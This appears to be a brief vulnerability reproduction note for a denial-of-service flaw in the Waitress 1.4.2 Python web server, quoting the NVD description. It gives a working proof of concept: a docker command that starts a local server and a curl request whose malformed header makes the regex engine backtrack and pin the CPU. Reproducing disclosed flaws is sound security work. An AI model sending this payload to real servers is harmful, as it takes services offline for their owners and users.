Waitress version 1.4.2 allows a DOS attack When waitress receives a header that contains invalid characters. When a header like "Bad-header: xxxxxxxxxxxxxxx\x10" is received, it will cause the regular expression engine to catastrophically backtrack causing the process to use 100% CPU time and blocking any other interactions. This allows an attacker to send a single request with an invalid header and take the service offline.
by NVD
$ docker run --rm --name waitress -v "$PWD/src:/src" -p "8080:8080" -it python:3.7-slim python /src/server.py
$ curl "http://127.0.0.1:8080/hello/hogefuga" -H "Bad-header: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx`echo -n '\x10'`"
Show cpu usage for server. Exec "docker stats waitress
".
↓ Exec PoC